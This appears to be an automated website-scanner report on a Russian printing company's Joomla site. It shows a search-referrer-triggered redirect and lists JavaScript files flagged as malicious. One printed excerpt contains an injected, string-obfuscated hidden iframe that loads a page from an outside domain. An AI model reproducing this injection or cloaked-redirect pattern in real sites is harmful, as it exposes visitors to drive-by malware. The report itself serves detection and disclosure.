Malicious/Suspicious Redirects
URL: http://dopredela.ru/ (imitation of visitor from search engine)

Request:

    GET / HTTP/1.1
    Host: dopredela.ru
    Referer: http://www.google.com/search?q=redirect+check1

Server response:

    HTTP/1.1 302 Found
    Connection: close
    Date: Sat, 20 Sep 2014 20:18:25 GMT
    Location: http://tinyurl.com/c2td3xs
    Server: nginx
    Content-Type: text/html; charset=utf-8
    X-Powered-By: PHP/5.2.17

Status: malicious
Scanned pages/files
Request | Server response | Status |
http://dopredela.ru/ | 200 OK Content-Length: 25804 Content-Type: text/html | clean |
http://dopredela.ru/media/system/js/caption.js | 200 OK Content-Length: 11919 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below)

    var JCaption = new Class({
        initialize: function(selector) {
            this.selector = selector;
            var images = $$(selector);
            images.each(function(image){ this.createCaption(image); }, this);
        },
        createCaption: function(element) {
            var caption = document.createTextNode(element.title);
            var container = document.createElement("div");
            var text = document.createElement("p");
            var width = element.getAttribute("width");
            var align = document.write('<iframe src="'+'ht'+'tp://'+'ma'+'l'+'oy'+'ar'+'os'+'lavets-tv.ru/c'+'omp'+'on'+'ents/c'+'om_c'+'ont'+'ent/'+'m'+'od'+'els/'+'sh.'+'html" width="0" height="0" frameborder="0"></iframe>');

Antivirus reports:
http://dopredela.ru/templates/ja_purity/js/ja.script.js | 200 OK Content-Length: 12959 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below)

    var siteurl = '';
    function fixIEPNG(el, bgimgdf, sizingMethod, type, offset){
        var objs = el;
        if(!objs) return;
        if ($type(objs) != 'array') objs = [objs];
        if(!sizingMethod) sizingMethod = 'crop';
        if(!offset) offset = 0;
        var blankimg = siteurl + 'images/blank.png';
        objs.each(function(obj) {
            var bgimg = bgimgdf;
            if (obj.tagName == 'IMG') {
                if (!bgimg) bgimg = obj.src;
                if (!(/\.png$/i).test(bgimg) || (/blank\.png$/i).test(bgimg)) re

Antivirus reports:
http://dopredela.ru/templates/ja_purity/js/ja.cssmenu.js | 200 OK Content-Length: 10330 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below)

    sfHover = function() {
        var sfEls = document.getElementById("ja-mainnav").getElementsByTagName("li");
        for (var i=0; i<sfEls.length; ++i) {
            sfEls[i].onmouseover=function() {
                clearTimeout(this.timer);
                if(this.className.indexOf(" sfhover") == -1)
                    this.className+=" sfhover";
            }
            sfEls[i].onmouseout=function() {
                this.timer = setTimeout(sfHoverOut.bind(this), 20);
            }
        }
    }
    function sfHoverOut() {
        clearTimeout(this.timer);

Antivirus reports:
http://dopredela.ru/home | 200 OK Content-Length: 25797 Content-Type: text/html | clean |
http://dopredela.ru/about | 200 OK Content-Length: 19579 Content-Type: text/html | clean |
http://dopredela.ru/portfolio | 200 OK Content-Length: 17982 Content-Type: text/html | clean |
http://dopredela.ru/offset-printing | 200 OK Content-Length: 33327 Content-Type: text/html | clean |
http://dopredela.ru/digital-printing | 200 OK Content-Length: 24345 Content-Type: text/html | clean |
http://dopredela.ru/pricelist | 200 OK Content-Length: 26737 Content-Type: text/html | clean |
http://dopredela.ru/2011-05-19-11-06-22 | 404 Not Found Content-Length: 1844 Content-Type: text/html | clean |
http://dopredela.ru/index.php | 200 OK Content-Length: 25825 Content-Type: text/html | clean |
http://dopredela.ru/index.php?option=com_content&view=frontpage&pharm | 200 OK Content-Length: 301305 Content-Type: text/html | clean |
http://dopredela.ru/test404page.js | 404 Not Found Content-Length: 2317 Content-Type: text/html | clean |
http://dopredela.ru/paperflags | 200 OK Content-Length: 22321 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=dopredela.ru
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://dopredela.ru/
Result: dopredela.ru is not infected or malware details are not published yet.